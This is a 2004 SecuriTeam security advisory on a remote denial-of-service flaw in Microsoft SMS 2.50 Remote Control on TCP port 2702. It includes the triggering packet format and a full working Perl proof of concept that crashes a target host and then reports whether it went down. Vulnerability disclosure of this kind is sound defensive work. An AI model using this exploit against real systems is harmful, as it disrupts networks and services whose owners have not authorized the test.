[NT] Denial of Service in Microsoft SMS Client (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 07/25/04

  • Next message: SecuriTeam: "[NEWS] Mozilla Firefox Certificate Spoofing" 
    To: list@securiteam.com
Date: 25 Jul 2004 16:30:11 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Denial of Service in Microsoft SMS Client (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    Microsoft Systems Management Server provides configuration management
    solution for Windows platform. It is widely deployed in medium and large
    network environments. A flaw in SMS Remote Control service makes possible
    to crash the service remotely leading to the DoS condition.

    The included Perl code will demonstrate the vulnerability against a live
    server, so administrators will be able to test the security of their own
    Systems Management Server's.

    DETAILS

    Vulnerable Systems:
     * Microsoft Systems Management Server version 2.50.2726.0

    SMS Remote Control Client service is listening on TCP ports 2701 and 2702.
    The service performs basic signature checks and size tests on received
    data and assumes the data is correct if those tests pass. It is possible
    to create a data packet that will go through basic checks and throw an
    exception by causing the server to read or write to an invalid memory
    address. It is also possible to specify the memory address value in the
    data packet. Initial analysis showed that the problem is not [easily]
    exploitable because there is no buffer overflow condition and it is not
    possible to specify the data to be written to the memory. The exception
    occurs in multprot.dll library when the service makes an API call with
    invalid parameters.

    Demonstration:
    The problem can be reproduced by sending the "RCH0####RCHE" string
    followed by a large number of characters (over 130) to TCP port 2702.

    Proof of Concept Code:
    You may test your own Systems Management Server's for vulnerability to
    this issue by using the following Perl code:

    #!/usr/bin/perl

    #############################
    #
    # SMS DOS proof of concept and test code
    # MacDefender / SRR project group of Ready Response wang@readyresponse.org
    #
    #############################

    use Socket;
    use IO::Socket;

    if (@ARGV != 1)
    {
            print "usage: $0 <host or ip>\n";
            exit;
    }

    $host = shift(@ARGV);

    $hexmsg =
    converthex("5243483016004000524348455858585858585858585858585858585858585
    858585858585858585858585858585858585858585858585858585858585858585858585
    858585858585858585858585858585858585858585858585858585858585858585858585
    858585858585858585858585858585858585858585858585858585858585858585858585
    858585858");

    print "\nCreating socket for connection to: $host\n\n";

    my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort =>
    "(2702)", Proto => "tcp") or die("Could not create socket: $!\n");

    $sock1->autoflush(1);

    print $sock1 "$hexmsg";

    while (<$sock1>)
    {
            print;
    }

    print "\nPacket sent to $host (please wait) ...\n";

    sleep(2);

    print "Verifying status of $host ...\n";

    sleep(2);

    my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort =>
    '(2702)', Proto => 'tcp') or die("\nDOS was successful - $host is down
    ..\n");

    print "\nAttempt was not successful. $host is still alive and responding
    ..\n";

    close($sock1);
    close($sock2);

    #############################
    # End main code, start subs
    #############################

    sub converthex
    {
            local ($l) = @_;
            $l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;

            return $l;
    }

    #############################
    # End code
    #############################

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:vuln@hexview.com> Hexview
    Vulnerability Disclosure.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Mozilla Firefox Certificate Spoofing"

    Relevant Pages